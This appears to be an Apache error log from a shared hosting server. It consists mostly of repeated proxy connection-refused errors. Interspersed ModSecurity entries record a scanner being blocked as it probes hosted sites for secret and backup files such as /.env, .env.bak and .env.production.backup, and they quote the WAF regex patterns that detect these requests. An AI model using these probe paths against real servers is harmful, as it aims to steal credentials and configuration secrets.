[Tue May 26 14:48:37.762509 2026] [proxy_http:error] [pid 648203:tid 648428] [client 5.255.125.104:52652] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.763022 2026] [proxy:error] [pid 648203:tid 648458] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.763096 2026] [proxy_http:error] [pid 648203:tid 648458] [client 5.255.125.104:52560] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.777445 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.5:35036] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/.env.bak"] [unique_id "ahVlbbEQDDtxJNiDrdTayQAAALI"]
[Tue May 26 14:48:37.812871 2026] [proxy:error] [pid 648203:tid 648457] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.812924 2026] [proxy_http:error] [pid 648203:tid 648457] [client 5.255.125.104:52518] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.813024 2026] [proxy:error] [pid 648203:tid 648367] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.813073 2026] [proxy_http:error] [pid 648203:tid 648367] [client 5.255.125.104:52426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.813208 2026] [proxy:error] [pid 648203:tid 648403] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.813258 2026] [proxy_http:error] [pid 648203:tid 648403] [client 5.255.125.104:52462] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.813481 2026] [proxy:error] [pid 648203:tid 648457] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.813511 2026] [proxy_http:error] [pid 648203:tid 648457] [client 5.255.125.104:52518] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.813865 2026] [proxy:error] [pid 648203:tid 648367] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.813906 2026] [proxy_http:error] [pid 648203:tid 648367] [client 5.255.125.104:52426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.814121 2026] [proxy:error] [pid 648203:tid 648403] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.814163 2026] [proxy_http:error] [pid 648203:tid 648403] [client 5.255.125.104:52462] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.814406 2026] [proxy:error] [pid 648203:tid 648434] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.814475 2026] [proxy_http:error] [pid 648203:tid 648434] [client 5.255.125.104:52368] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.814572 2026] [proxy:error] [pid 648203:tid 648354] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.814618 2026] [proxy_http:error] [pid 648203:tid 648354] [client 5.255.125.104:52446] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.815180 2026] [security2:error] [pid 648203:tid 648425] [client 5.255.125.104:52400] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahVlbbEQDDtxJNiDrdTa0QAAAOE"]
[Tue May 26 14:48:37.815244 2026] [proxy:error] [pid 648203:tid 648354] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.815279 2026] [proxy_http:error] [pid 648203:tid 648354] [client 5.255.125.104:52446] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.815479 2026] [proxy:error] [pid 648203:tid 648434] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.815520 2026] [proxy_http:error] [pid 648203:tid 648434] [client 5.255.125.104:52368] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.815524 2026] [security2:error] [pid 648203:tid 648401] [client 5.255.125.104:52384] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahVlbbEQDDtxJNiDrdTa0gAAAMk"]
[Tue May 26 14:48:37.816604 2026] [proxy:error] [pid 648203:tid 648457] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.816651 2026] [proxy_http:error] [pid 648203:tid 648457] [client 5.255.125.104:52466] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.817237 2026] [proxy:error] [pid 648203:tid 648457] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.817272 2026] [proxy_http:error] [pid 648203:tid 648457] [client 5.255.125.104:52466] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.817662 2026] [proxy:error] [pid 648203:tid 648423] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.817732 2026] [proxy_http:error] [pid 648203:tid 648423] [client 5.255.125.104:52436] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.818327 2026] [proxy:error] [pid 648203:tid 648423] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.818376 2026] [proxy_http:error] [pid 648203:tid 648423] [client 5.255.125.104:52436] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.827310 2026] [proxy:error] [pid 648203:tid 648397] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.827352 2026] [proxy_http:error] [pid 648203:tid 648397] [client 5.255.125.104:52570] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.827435 2026] [proxy:error] [pid 648203:tid 648412] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.827473 2026] [proxy_http:error] [pid 648203:tid 648412] [client 5.255.125.104:52532] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.827648 2026] [proxy:error] [pid 648203:tid 648406] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.827707 2026] [proxy_http:error] [pid 648203:tid 648406] [client 5.255.125.104:52654] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.828022 2026] [proxy:error] [pid 648203:tid 648397] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.828055 2026] [proxy_http:error] [pid 648203:tid 648397] [client 5.255.125.104:52570] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.828155 2026] [proxy:error] [pid 648203:tid 648336] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.828199 2026] [proxy_http:error] [pid 648203:tid 648336] [client 5.255.125.104:52480] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.828264 2026] [proxy:error] [pid 648203:tid 648412] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.828294 2026] [proxy_http:error] [pid 648203:tid 648412] [client 5.255.125.104:52532] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.828445 2026] [proxy:error] [pid 648203:tid 648371] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.828484 2026] [proxy_http:error] [pid 648203:tid 648371] [client 5.255.125.104:52546] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.828713 2026] [proxy:error] [pid 648203:tid 648406] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.828800 2026] [proxy_http:error] [pid 648203:tid 648406] [client 5.255.125.104:52654] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.829074 2026] [proxy:error] [pid 648203:tid 648336] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.829118 2026] [proxy_http:error] [pid 648203:tid 648336] [client 5.255.125.104:52480] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.829592 2026] [proxy:error] [pid 648203:tid 648364] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.829686 2026] [proxy_http:error] [pid 648203:tid 648364] [client 5.255.125.104:52632] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.829904 2026] [proxy:error] [pid 648203:tid 648334] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.829954 2026] [proxy_http:error] [pid 648203:tid 648334] [client 5.255.125.104:52618] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.830401 2026] [proxy:error] [pid 648203:tid 648364] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.830471 2026] [proxy_http:error] [pid 648203:tid 648364] [client 5.255.125.104:52632] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.830570 2026] [proxy:error] [pid 648203:tid 648334] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.830604 2026] [proxy_http:error] [pid 648203:tid 648334] [client 5.255.125.104:52618] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.830809 2026] [proxy:error] [pid 648203:tid 648371] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.830847 2026] [proxy_http:error] [pid 648203:tid 648371] [client 5.255.125.104:52546] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.830986 2026] [security2:error] [pid 648203:tid 648444] [client 5.255.125.104:52416] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahVlbbEQDDtxJNiDrdTa3gAAAPQ"]
[Tue May 26 14:48:37.831227 2026] [proxy:error] [pid 648203:tid 648453] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.831272 2026] [proxy_http:error] [pid 648203:tid 648453] [client 5.255.125.104:52526] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.831410 2026] [proxy:error] [pid 648203:tid 648351] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.831486 2026] [proxy_http:error] [pid 648203:tid 648351] [client 5.255.125.104:52586] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.831948 2026] [proxy:error] [pid 648203:tid 648453] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.831992 2026] [proxy_http:error] [pid 648203:tid 648453] [client 5.255.125.104:52526] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.832298 2026] [security2:error] [pid 648203:tid 648433] [client 5.255.125.104:52340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahVlbbEQDDtxJNiDrdTa3QAAAOk"]
[Tue May 26 14:48:37.832322 2026] [proxy:error] [pid 648203:tid 648351] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.832368 2026] [proxy_http:error] [pid 648203:tid 648351] [client 5.255.125.104:52586] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.832484 2026] [proxy:error] [pid 648203:tid 648406] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.832549 2026] [proxy_http:error] [pid 648203:tid 648406] [client 5.255.125.104:52642] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.832912 2026] [proxy:error] [pid 648203:tid 648371] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.832960 2026] [proxy_http:error] [pid 648203:tid 648371] [client 5.255.125.104:52638] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.833119 2026] [proxy:error] [pid 648203:tid 648353] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.833192 2026] [proxy_http:error] [pid 648203:tid 648353] [client 5.255.125.104:52598] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.833762 2026] [proxy:error] [pid 648203:tid 648406] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.833830 2026] [proxy_http:error] [pid 648203:tid 648406] [client 5.255.125.104:52642] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.833913 2026] [proxy:error] [pid 648203:tid 648371] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.833950 2026] [proxy_http:error] [pid 648203:tid 648371] [client 5.255.125.104:52638] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.834369 2026] [proxy:error] [pid 648203:tid 648353] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.834515 2026] [proxy_http:error] [pid 648203:tid 648353] [client 5.255.125.104:52598] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.834638 2026] [proxy:error] [pid 648203:tid 648419] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.834678 2026] [proxy_http:error] [pid 648203:tid 648419] [client 5.255.125.104:52494] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.835567 2026] [proxy:error] [pid 648203:tid 648419] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.835605 2026] [proxy_http:error] [pid 648203:tid 648419] [client 5.255.125.104:52494] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.880084 2026] [core:error] [pid 648203:tid 648362] [client 92.112.175.24:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:48:37.880099 2026] [core:error] [pid 648203:tid 648362] [client 92.112.175.24:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:48:37.883433 2026] [proxy:error] [pid 648203:tid 648391] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.883471 2026] [proxy_http:error] [pid 648203:tid 648391] [client 5.255.125.104:52506] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.884070 2026] [proxy:error] [pid 648203:tid 648391] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.884104 2026] [proxy_http:error] [pid 648203:tid 648391] [client 5.255.125.104:52506] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.886675 2026] [proxy:error] [pid 648203:tid 648426] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.886724 2026] [proxy_http:error] [pid 648203:tid 648426] [client 5.255.125.104:52658] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.887295 2026] [proxy:error] [pid 648203:tid 648426] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.887326 2026] [proxy_http:error] [pid 648203:tid 648426] [client 5.255.125.104:52658] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:38.755756 2026] [security2:error] [pid 648203:tid 648427] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlbrEQDDtxJNiDrdTa-AAAAOM"]
[Tue May 26 14:48:38.768273 2026] [proxy:error] [pid 648203:tid 648339] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:38.768343 2026] [proxy_http:error] [pid 648203:tid 648339] [client 5.255.125.104:52664] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:38.769177 2026] [proxy:error] [pid 648203:tid 648339] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:38.769219 2026] [proxy_http:error] [pid 648203:tid 648339] [client 5.255.125.104:52664] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:39.360969 2026] [security2:error] [pid 648203:tid 648447] [client 74.249.173.207:2570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVlb7EQDDtxJNiDrdTbIgAAAPc"]
[Tue May 26 14:48:39.493682 2026] [security2:error] [pid 648203:tid 648394] [client 104.207.45.121:39041] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlbrEQDDtxJNiDrdTa_AAAAMI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:39.682251 2026] [proxy:error] [pid 648203:tid 648410] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:39.682322 2026] [proxy_http:error] [pid 648203:tid 648410] [client 5.255.125.104:52416] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:39.682936 2026] [proxy:error] [pid 648203:tid 648410] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:39.682969 2026] [proxy_http:error] [pid 648203:tid 648410] [client 5.255.125.104:52416] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:40.381496 2026] [security2:error] [pid 648203:tid 648403] [client 5.255.125.104:52340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahVlcLEQDDtxJNiDrdTbOwAAAMs"]
[Tue May 26 14:48:40.468615 2026] [proxy:error] [pid 648203:tid 648354] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:40.468685 2026] [proxy_http:error] [pid 648203:tid 648354] [client 5.255.125.104:52400] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:40.469263 2026] [proxy:error] [pid 648203:tid 648354] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:40.469291 2026] [proxy_http:error] [pid 648203:tid 648354] [client 5.255.125.104:52400] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:40.470436 2026] [proxy:error] [pid 648203:tid 648414] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:40.470533 2026] [proxy_http:error] [pid 648203:tid 648414] [client 5.255.125.104:52384] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:40.471229 2026] [proxy:error] [pid 648203:tid 648414] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:40.471267 2026] [proxy_http:error] [pid 648203:tid 648414] [client 5.255.125.104:52384] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:40.826604 2026] [security2:error] [pid 648203:tid 648413] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlcLEQDDtxJNiDrdTbPgAAANU"]
[Tue May 26 14:48:41.406122 2026] [security2:error] [pid 648203:tid 648337] [client 5.255.125.104:52718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahVlcbEQDDtxJNiDrdTbVQAAAIk"]
[Tue May 26 14:48:41.434287 2026] [proxy:error] [pid 648203:tid 648400] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.434359 2026] [proxy_http:error] [pid 648203:tid 648400] [client 5.255.125.104:52340] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.434985 2026] [proxy:error] [pid 648203:tid 648400] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.435028 2026] [proxy_http:error] [pid 648203:tid 648400] [client 5.255.125.104:52340] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.540127 2026] [security2:error] [pid 648203:tid 648447] [client 5.255.125.104:52698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahVlcbEQDDtxJNiDrdTbXwAAAPc"]
[Tue May 26 14:48:41.552615 2026] [security2:error] [pid 648203:tid 648407] [client 5.255.125.104:52720] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahVlcbEQDDtxJNiDrdTbYQAAAM8"]
[Tue May 26 14:48:41.554445 2026] [security2:error] [pid 648203:tid 648394] [client 5.255.125.104:52776] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahVlcbEQDDtxJNiDrdTbZgAAAMI"]
[Tue May 26 14:48:41.554450 2026] [security2:error] [pid 648203:tid 648341] [client 5.255.125.104:52712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahVlcbEQDDtxJNiDrdTbYwAAAI0"]
[Tue May 26 14:48:41.554812 2026] [proxy:error] [pid 648203:tid 648404] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.554864 2026] [proxy_http:error] [pid 648203:tid 648404] [client 5.255.125.104:52680] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
